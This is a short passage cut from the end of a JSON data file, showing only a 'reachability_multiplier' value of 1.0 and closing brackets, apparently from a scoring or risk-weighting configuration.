1.0, "reachability_multiplier": 1.0 } } } ] }